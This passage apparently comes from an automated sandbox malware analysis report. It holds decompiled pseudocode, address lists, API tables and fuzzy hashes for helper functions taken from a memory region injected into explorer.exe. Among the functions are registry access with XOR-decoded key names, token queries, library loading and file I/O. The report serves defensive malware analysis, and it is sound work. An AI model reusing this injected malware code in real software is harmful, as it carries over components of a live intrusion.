							do {
								L30:
								 *(_t151 + _t172 + 4) =  *(_t176 + (_t172 & 0x00000003) + 8) ^ _t173[_t172];
								_t172 = _t172 + 1;
							} while (_t172 <  *_t151);
							goto L33;
						}
						_v16 = _t172;
						if(RegCreateKeyA(_v8, _t173,  &_v16) != 0) {
							goto L32;
						}
						_t115 = _a8;
						if(_t115 != 0) {
							 *_t115 = _t172;
						}
						RegCloseKey(_v16);
						goto L28;
					}
					_push(_t172);
					_push(_v16);
					_t174 = "\\";
					_push(_t174);
					_t129 = E032E9BA4(_v12);
					_t177 = _t177 + 0x10;
					_v40 = _t129;
					if(_t129 == 0) {
						goto L32;
					}
					_push( &_v36);
					_push(0x20019);
					_push(_t172);
					_push(_t129);
					_t130 =  *0x32ff8e8; // 0x52ef8b8
					_push(_v8);
					if( *((intOrPtr*)(_t130 + 0x14))() == 0) {
						_t132 =  *0x32ff8e8; // 0x52ef8b8
						 *((intOrPtr*)(_t132 + 0x1c))(_v36);
					} else {
						_t139 = E032E9F8F( &_v36, 0x304);
						_push(_t172);
						_push(_t139);
						_push(0x32fc9d8);
						_v24 = _t139;
						_t175 = E032E9BF7(_v32);
						_v32 = _t175;
						E032E8D41( &_v24);
						_t179 = _t177 + 0x18;
						_t143 = E032E9ACD(_v12);
						_push(_t175);
						_push(_t143);
						_push(_v8);
						_v24 = _t143;
						_t144 =  *0x32ff8e8; // 0x52ef8b8
						if( *((intOrPtr*)(_t144 + 0x30))() == 0) {
							_t150 = _a12;
							if(_t150 != 0) {
								 *_t150 = 1;
							}
						}
						E032E8D86( &_v32, 0xfffffffe);
						E032E8D86( &_v24, 0xfffffffe);
						_t177 = _t179 + 0x10;
						_t174 = "\\";
					}
					_t135 = E032E9BA4(_v12);
					_t167 =  *0x32ff8e0; // 0x52ef6c8
					_t177 = _t177 + 0x18;
					_t173 = _t135;
					_v20 = _t173;
					 *((intOrPtr*)(_t167 + 0x34))(_v12, _t174, _v16, _t174,  &_v108, _t172);
					E032E8D86( &_v40, 0xffffffff);
					goto L20;
				}
			}














































                                                                                                            0x032ea7d9
                                                                                                            0x032ea7db
                                                                                                            0x032ea7de
                                                                                                            0x032ea7e0
                                                                                                            0x032ea7e8
                                                                                                            0x032ea7eb
                                                                                                            0x032ea7f2
                                                                                                            0x032ea7f5
                                                                                                            0x032ea7fa
                                                                                                            0x032ea7fc
                                                                                                            0x032ea800
                                                                                                            0x032ea802
                                                                                                            0x032eaaa3
                                                                                                            0x032eaaa3
                                                                                                            0x032ea808
                                                                                                            0x032ea810
                                                                                                            0x032ea816
                                                                                                            0x032ea81d
                                                                                                            0x032ea825
                                                                                                            0x032ea828
                                                                                                            0x032ea82a
                                                                                                            0x032ea82a
                                                                                                            0x032ea832
                                                                                                            0x032ea835
                                                                                                            0x032ea83a
                                                                                                            0x032ea83d
                                                                                                            0x032ea842
                                                                                                            0x032ea97b
                                                                                                            0x032ea97b
                                                                                                            0x032ea981
                                                                                                            0x032ea988
                                                                                                            0x032ea9c9
                                                                                                            0x032ea9cd
                                                                                                            0x032ea9ce
                                                                                                            0x032ea9d4
                                                                                                            0x032ea9d9
                                                                                                            0x032ea9dc
                                                                                                            0x032ea9dc
                                                                                                            0x032ea9de
                                                                                                            0x00000000
                                                                                                            0x032ea9de
                                                                                                            0x032ea98d
                                                                                                            0x032ea997
                                                                                                            0x032ea9a0
                                                                                                            0x032ea9a5
                                                                                                            0x032ea9a8
                                                                                                            0x032ea9ab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ea9ad
                                                                                                            0x032ea9b1
                                                                                                            0x032ea9b2
                                                                                                            0x032ea9b7
                                                                                                            0x032ea9b8
                                                                                                            0x032ea9bb
                                                                                                            0x032ea9bf
                                                                                                            0x032ea9c4
                                                                                                            0x00000000
                                                                                                            0x032ea848
                                                                                                            0x032ea848
                                                                                                            0x032ea853
                                                                                                            0x032ea855
                                                                                                            0x032ea85a
                                                                                                            0x032ea860
                                                                                                            0x032ea978
                                                                                                            0x00000000
                                                                                                            0x032ea978
                                                                                                            0x032ea869
                                                                                                            0x032ea86d
                                                                                                            0x032ea875
                                                                                                            0x032ea87c
                                                                                                            0x032ea882
                                                                                                            0x032ea9e1
                                                                                                            0x032ea9e4
                                                                                                            0x032eaa01
                                                                                                            0x032eaa28
                                                                                                            0x032eaa2b
                                                                                                            0x032eaa2d
                                                                                                            0x032eaa2f
                                                                                                            0x032eaa2f
                                                                                                            0x032eaa3d
                                                                                                            0x032eaa38
                                                                                                            0x032eaa42
                                                                                                            0x032eaa71
                                                                                                            0x032eaa7a
                                                                                                            0x032eaa86
                                                                                                            0x032eaa8e
                                                                                                            0x032eaa90
                                                                                                            0x032eaa96
                                                                                                            0x00000000
                                                                                                            0x032eaa9d
                                                                                                            0x032eaa48
                                                                                                            0x032eaa4e
                                                                                                            0x032eaa53
                                                                                                            0x032eaa58
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eaa5a
                                                                                                            0x032eaa5a
                                                                                                            0x032eaa66
                                                                                                            0x032eaa6a
                                                                                                            0x032eaa6b
                                                                                                            0x00000000
                                                                                                            0x032eaa6f
                                                                                                            0x032eaa06
                                                                                                            0x032eaa18
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eaa1a
                                                                                                            0x032eaa1f
                                                                                                            0x032eaa21
                                                                                                            0x032eaa21
                                                                                                            0x032eaa3d
                                                                                                            0x00000000
                                                                                                            0x032eaa3d
                                                                                                            0x032ea888
                                                                                                            0x032ea889
                                                                                                            0x032ea88c
                                                                                                            0x032ea891
                                                                                                            0x032ea895
                                                                                                            0x032ea89a
                                                                                                            0x032ea89d
                                                                                                            0x032ea8a2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ea8ab
                                                                                                            0x032ea8ac
                                                                                                            0x032ea8b1
                                                                                                            0x032ea8b2
                                                                                                            0x032ea8b3
                                                                                                            0x032ea8b8
                                                                                                            0x032ea8c0
                                                                                                            0x032ea938
                                                                                                            0x032ea940
                                                                                                            0x032ea8c2
                                                                                                            0x032ea8c7
                                                                                                            0x032ea8cc
                                                                                                            0x032ea8cd
                                                                                                            0x032ea8ce
                                                                                                            0x032ea8d6
                                                                                                            0x032ea8de
                                                                                                            0x032ea8e4
                                                                                                            0x032ea8e7
                                                                                                            0x032ea8ef
                                                                                                            0x032ea8f2
                                                                                                            0x032ea8f7
                                                                                                            0x032ea8f8
                                                                                                            0x032ea8f9
                                                                                                            0x032ea8fc
                                                                                                            0x032ea8ff
                                                                                                            0x032ea909
                                                                                                            0x032ea90b
                                                                                                            0x032ea910
                                                                                                            0x032ea912
                                                                                                            0x032ea912
                                                                                                            0x032ea910
                                                                                                            0x032ea91e
                                                                                                            0x032ea929
                                                                                                            0x032ea92e
                                                                                                            0x032ea931
                                                                                                            0x032ea931
                                                                                                            0x032ea950
                                                                                                            0x032ea955
                                                                                                            0x032ea95b
                                                                                                            0x032ea95e
                                                                                                            0x032ea960
                                                                                                            0x032ea966
                                                                                                            0x032ea96f
                                                                                                            0x00000000
                                                                                                            0x032ea975

                                                                                                            APIs
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                              • Part of subcall function 032E8D86: RtlFreeHeap.NTDLL(00000000,00000000), ref: 032E8DCC
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,032EA7BE,?,?,00000001), ref: 032EA9FC
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000,?,?,00000001), ref: 032EAA13
                                                                                                            • RegCloseKey.KERNELBASE(032EA7BE,?,?,00000001), ref: 032EAA3D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocateCloseCreateFreeOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3570936880-0
                                                                                                            • Opcode ID: e3630c3b9def291c6b048f13c3d081d3cff8e33d9ed8e85ea46ad4c5cd42daf5
                                                                                                            • Instruction ID: 39d8167322476ad1ea8e0ca1dd6b9990cc87478edc03f37e5943d9b3b924488f
                                                                                                            • Opcode Fuzzy Hash: e3630c3b9def291c6b048f13c3d081d3cff8e33d9ed8e85ea46ad4c5cd42daf5
                                                                                                            • Instruction Fuzzy Hash: 64917B75D1020AAFDF10DFA4ED46DEEBBB8EF09710F5441A9E504EB251D7719A80CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EC997 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 131 32ec997-32ec9b7 GetTokenInformation 132 32ec9fd 131->132 133 32ec9b9-32ec9c2 GetLastError 131->133 134 32ec9ff-32eca03 132->134 133->132 135 32ec9c4-32ec9d4 call 32e8d70 133->135 138 32ec9da-32ec9ed GetTokenInformation 135->138 139 32ec9d6-32ec9d8 135->139 138->132 140 32ec9ef-32ec9fb call 32e8d86 138->140 139->134 140->139
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E032EC997(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E032E8D70(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E032E8D86( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                                                                                                            0x032ec99a
                                                                                                            0x032ec99b
                                                                                                            0x032ec9a2
                                                                                                            0x032ec9aa
                                                                                                            0x032ec9ae
                                                                                                            0x032ec9b7
                                                                                                            0x032ec9fd
                                                                                                            0x032ec9fd
                                                                                                            0x032ec9c4
                                                                                                            0x032ec9cc
                                                                                                            0x032ec9ce
                                                                                                            0x032ec9d4
                                                                                                            0x032ec9ed
                                                                                                            0x00000000
                                                                                                            0x032ec9ef
                                                                                                            0x032ec9f4
                                                                                                            0x00000000
                                                                                                            0x032ec9fa
                                                                                                            0x032ec9d6
                                                                                                            0x032ec9d6
                                                                                                            0x032ec9d6
                                                                                                            0x032ec9d6
                                                                                                            0x032ec9d4
                                                                                                            0x032eca03

                                                                                                            APIs
                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,032E0000,00000000,00000000,?,032ECA18,00000000,00000000,?,032ECA41), ref: 032EC9B2
                                                                                                            • GetLastError.KERNEL32(?,032ECA18,00000000,00000000,?,032ECA41,00001644,?,032EE0D1), ref: 032EC9B9
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,032ECA18,00000000,00000000,?,032ECA41,00001644,?,032EE0D1), ref: 032EC9E8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 2499131667-0
                                                                                                            • Opcode ID: 0f4dbd07c0b478dfa976efaaf8957666fba814f6ee24cd96833fe57db294ad09
                                                                                                            • Instruction ID: 4b5ef7692c762edf173d72861e86709f30ab995bf4cee0f2b1cf8b6db1d2aa7a
                                                                                                            • Opcode Fuzzy Hash: 0f4dbd07c0b478dfa976efaaf8957666fba814f6ee24cd96833fe57db294ad09
                                                                                                            • Instruction Fuzzy Hash: 4101A273620229BF8B20DAE6ED4ADFF7FACDA456B17500166F405E7100EA70DD80C7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EF159 Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 159 32ef159-32ef179 call 32e9f75 162 32ef17b-32ef181 GetModuleHandleA 159->162 163 32ef183-32ef188 LoadLibraryA 159->163 164 32ef18a-32ef18c 162->164 163->164 165 32ef18e-32ef193 call 32ef10e 164->165 166 32ef19b-32ef1a9 call 32e8d2e 164->166 169 32ef198-32ef199 165->169 169->166
                                                                                                            C-Code - Quality: 47%
                                                                                                            			E032EF159(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E032E9F75(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x2b4) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E032EF10E(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E032E8D2E( &_v8);
				return _t25;
			}










                                                                                                            0x032ef15c
                                                                                                            0x032ef15f
                                                                                                            0x032ef165
                                                                                                            0x032ef167
                                                                                                            0x032ef16c
                                                                                                            0x032ef16e
                                                                                                            0x032ef178
                                                                                                            0x032ef179
                                                                                                            0x032ef188
                                                                                                            0x032ef17b
                                                                                                            0x032ef17b
                                                                                                            0x032ef17b
                                                                                                            0x032ef18c
                                                                                                            0x032ef193
                                                                                                            0x032ef199
                                                                                                            0x032ef199
                                                                                                            0x032ef19e
                                                                                                            0x032ef1a9

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,032FCA88,?,032E65E3,?), ref: 032EF17B
                                                                                                            • LoadLibraryA.KERNELBASE(00000000,?,?,?,032FCA88,?,032E65E3,?), ref: 032EF188
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HandleLibraryLoadModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4133054770-0
                                                                                                            • Opcode ID: 82719e319c393abca72745eea42200eceab8bc2e2c6e38b3fe7fa63b10339568
                                                                                                            • Instruction ID: 1b59a1235fdd6cd3268ac5ac263447ae40a54ed2d8824e0eb750f26dad5702a1
                                                                                                            • Opcode Fuzzy Hash: 82719e319c393abca72745eea42200eceab8bc2e2c6e38b3fe7fa63b10339568
                                                                                                            • Instruction Fuzzy Hash: CDF0A736724218BFD704FBA9EA4585AB3ECDF48694755407AF406DB250DAB0CD808790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EB564 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 171 32eb564-32eb573 172 32eb57c-32eb587 call 32eb49b 171->172 173 32eb575-32eb577 171->173 177 32eb5fd 172->177 178 32eb589-32eb59b 172->178 174 32eb601-32eb603 173->174 179 32eb5ff-32eb600 177->179 181 32eb59d-32eb5ae call 32e8d70 178->181 182 32eb5e3-32eb5ee 178->182 179->174 181->182 187 32eb5b0-32eb5c2 call 32eb509 181->187 182->177 186 32eb5f0-32eb5fc call 32e8d86 182->186 186->177 187->182 192 32eb5c4-32eb5c7 187->192 192->182 193 32eb5c9-32eb5d2 192->193 194 32eb5d6-32eb5e1 FindCloseChangeNotification 193->194 195 32eb5d4 193->195 194->179 195->194
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032EB564(char _a4, intOrPtr* _a8) {
				char _v8;
				void* __ecx;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				void* _t24;
				intOrPtr* _t25;
				void* _t29;
				intOrPtr _t42;
				char _t44;

				_t32 = _a4;
				_t44 = 0;
				_v8 = 0;
				if(_a4 != 0) {
					_t29 = E032EB49B(_t32);
					if(_t29 == 0) {
						L12:
						_t14 = 0;
						L13:
						L14:
						return _t14;
					}
					_t15 =  *0x32ff8e0; // 0x52ef6c8
					_t42 =  *((intOrPtr*)(_t15 + 0xf4))(_t29, 0);
					if(_t42 == 0) {
						L10:
						_t17 =  *0x32ff8e0; // 0x52ef6c8
						 *((intOrPtr*)(_t17 + 0x30))(_t29);
						if(_t44 != 0) {
							E032E8D86( &_v8, 0);
						}
						goto L12;
					}
					_t4 = _t42 + 1; // 0x1
					_t44 = E032E8D70(_t4);
					_v8 = _t44;
					if(_t44 == 0) {
						goto L10;
					}
					_t24 = E032EB509(_t29, _t44, _t42,  &_a4); // executed
					if(_t24 == 0 || _a4 != _t42) {
						goto L10;
					} else {
						_t25 = _a8;
						 *((char*)(_t42 + _t44)) = 0;
						if(_t25 != 0) {
							 *_t25 = _t42;
						}
						FindCloseChangeNotification(_t29);
						_t14 = _t44;
						goto L13;
					}
				}
				_t14 = 0;
				goto L14;
			}













                                                                                                            0x032eb568
                                                                                                            0x032eb56c
                                                                                                            0x032eb56e
                                                                                                            0x032eb573
                                                                                                            0x032eb583
                                                                                                            0x032eb587
                                                                                                            0x032eb5fd
                                                                                                            0x032eb5fd
                                                                                                            0x032eb5ff
                                                                                                            0x032eb601
                                                                                                            0x032eb603
                                                                                                            0x032eb603
                                                                                                            0x032eb589
                                                                                                            0x032eb597
                                                                                                            0x032eb59b
                                                                                                            0x032eb5e3
                                                                                                            0x032eb5e3
                                                                                                            0x032eb5e9
                                                                                                            0x032eb5ee
                                                                                                            0x032eb5f6
                                                                                                            0x032eb5fc
                                                                                                            0x00000000
                                                                                                            0x032eb5ee
                                                                                                            0x032eb59d
                                                                                                            0x032eb5a6
                                                                                                            0x032eb5a8
                                                                                                            0x032eb5ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eb5b9
                                                                                                            0x032eb5c2
                                                                                                            0x00000000
                                                                                                            0x032eb5c9
                                                                                                            0x032eb5c9
                                                                                                            0x032eb5cc
                                                                                                            0x032eb5d2
                                                                                                            0x032eb5d4
                                                                                                            0x032eb5d4
                                                                                                            0x032eb5dc
                                                                                                            0x032eb5df
                                                                                                            0x00000000
                                                                                                            0x032eb5df
                                                                                                            0x032eb5c2
                                                                                                            0x032eb575
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,032F0C39,00000000,00000000,0330EFE0,032FC9D8,00000000,032FC9D8,00000000,00000000,?,00000046,00000000,052EF6B0,00000400), ref: 032EB5DC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: c723165e6c273dda3efec71d559ef388db5c6b3b3bedf11dc2f9fb02362c63fc
                                                                                                            • Instruction ID: 8ae1fc3c5a718f241b78d43e79ed1064b2834c517a0c48f2ec752ee78bab11c7
                                                                                                            • Opcode Fuzzy Hash: c723165e6c273dda3efec71d559ef388db5c6b3b3bedf11dc2f9fb02362c63fc
                                                                                                            • Instruction Fuzzy Hash: AB110836628307AFCB11DFA9E985B6AB7ECEF44750F98406AF911CB240EB70D9408790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EB509 Relevance: 1.5, APIs: 1, Instructions: 45fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 196 32eb509-32eb522 197 32eb541-32eb54f ReadFile 196->197 198 32eb524-32eb528 197->198 199 32eb551-32eb555 197->199 200 32eb52a-32eb540 198->200 201 32eb556-32eb55b 198->201 200->197 202 32eb55f-32eb562 201->202 203 32eb55d 201->203 202->199 203->202
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,032EB5BE,00000000,00000000,?,032F0C39,00000000), ref: 032EB547
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 4a3cd483fb2bd6680f3aff5ffef3f4f08dadb7393b22e315517210b58e2a94d5
                                                                                                            • Instruction ID: 0aaea526bf327eb618e48d02360318f0249038049a04cc870327469d363d2317
                                                                                                            • Opcode Fuzzy Hash: 4a3cd483fb2bd6680f3aff5ffef3f4f08dadb7393b22e315517210b58e2a94d5
                                                                                                            • Instruction Fuzzy Hash: 34016D72621219FFDB10CEA9CC45BAB7BBCEB407A5F144069B819E7100E270EE40DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032ECA1B Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 204 32eca1b-32eca34 206 32eca38-32eca45 call 32eca04 204->206 207 32eca36-32eca37 204->207 210 32eca5b-32eca66 FindCloseChangeNotification 206->210 211 32eca47-32eca4a 206->211 214 32eca68-32eca6a 210->214 212 32eca4c-32eca51 211->212 213 32eca57-32eca59 211->213 212->213 213->214
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032ECA1B(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x32ff8e8; // 0x52ef8b8
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E032ECA04(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x32ff8e0; // 0x52ef6c8
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










                                                                                                            0x032eca1f
                                                                                                            0x032eca27
                                                                                                            0x032eca2f
                                                                                                            0x032eca34
                                                                                                            0x032eca3c
                                                                                                            0x032eca41
                                                                                                            0x032eca45
                                                                                                            0x032eca63
                                                                                                            0x032eca66
                                                                                                            0x032eca47
                                                                                                            0x032eca4a
                                                                                                            0x032eca4c
                                                                                                            0x032eca54
                                                                                                            0x032eca54
                                                                                                            0x032eca57
                                                                                                            0x032eca57
                                                                                                            0x032eca6a
                                                                                                            0x032eca37
                                                                                                            0x032eca37
                                                                                                            0x032eca37

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a4b0e765e2c58b4bf14c0d05c64f76f32ba50f597f0e0d8677145f1fbe1cdcef
                                                                                                            • Instruction ID: 541bdfdee822da1289b0bd4f5132255cc32aee5369dc471c527a35cf20153b0b
                                                                                                            • Opcode Fuzzy Hash: a4b0e765e2c58b4bf14c0d05c64f76f32ba50f597f0e0d8677145f1fbe1cdcef
                                                                                                            • Instruction Fuzzy Hash: C8F01732A20225EFCB10EBE4E90AA9D73E8FB08695F8440A4E501E7250E770DA40EB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032E8D86 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 215 32e8d86-32e8d8e 216 32e8dd3-32e8dd4 215->216 217 32e8d90-32e8d95 215->217 218 32e8d97-32e8da0 217->218 219 32e8dd2 217->219 220 32e8dab-32e8dae 218->220 221 32e8da2-32e8da9 call 32ea5da 218->221 219->216 223 32e8db7-32e8dcc call 32e8f0a RtlFreeHeap 220->223 224 32e8db0-32e8db2 call 32ea5f3 220->224 221->223 223->219 224->223
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032E8D86(char _a4, intOrPtr _a8) {
				char _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E032EA5F3(_t9);
						}
					} else {
						_t4 = E032EA5DA(_t9);
					}
					E032E8F0A(_t9, 0, _t4);
					_t3 = RtlFreeHeap( *0x32ff9c8, 0, _t9); // executed
				}
				return _t3;
			}






                                                                                                            0x032e8d89
                                                                                                            0x032e8d8e
                                                                                                            0x032e8dd4
                                                                                                            0x032e8dd4
                                                                                                            0x032e8d91
                                                                                                            0x032e8d95
                                                                                                            0x032e8d97
                                                                                                            0x032e8d9a
                                                                                                            0x032e8da0
                                                                                                            0x032e8dae
                                                                                                            0x032e8db2
                                                                                                            0x032e8db2
                                                                                                            0x032e8da2
                                                                                                            0x032e8da3
                                                                                                            0x032e8da8
                                                                                                            0x032e8dbb
                                                                                                            0x032e8dcc
                                                                                                            0x032e8dcc
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 032E8DCC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: 969390585e389984d24a5e6584bb9e3098a56e5bc02ddd07d0438bfef974c413
                                                                                                            • Instruction ID: aff84d4fcb5fe253f8031427f7586ccb69524a38f6f976a55a24d8d06c05e5f4
                                                                                                            • Opcode Fuzzy Hash: 969390585e389984d24a5e6584bb9e3098a56e5bc02ddd07d0438bfef974c413
                                                                                                            • Instruction Fuzzy Hash: 75F03732921615AFDB11A674EC02BAB37599F22F30F980355F5649A1D0D770A9C086D5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EB457 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 229 32eb457-32eb47a CreateFileW 230 32eb47c-32eb47e 229->230 231 32eb480-32eb483 229->231 232 32eb497-32eb49a 230->232 233 32eb495 231->233 234 32eb485-32eb48e 231->234 233->232 234->233
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032EB457(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x32ff8e0; // 0x52ef6c8
						 *((intOrPtr*)(_t6 + 0x88))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






                                                                                                            0x032eb461
                                                                                                            0x032eb475
                                                                                                            0x032eb47a
                                                                                                            0x032eb483
                                                                                                            0x032eb485
                                                                                                            0x032eb48f
                                                                                                            0x032eb48f
                                                                                                            0x00000000
                                                                                                            0x032eb495
                                                                                                            0x00000000

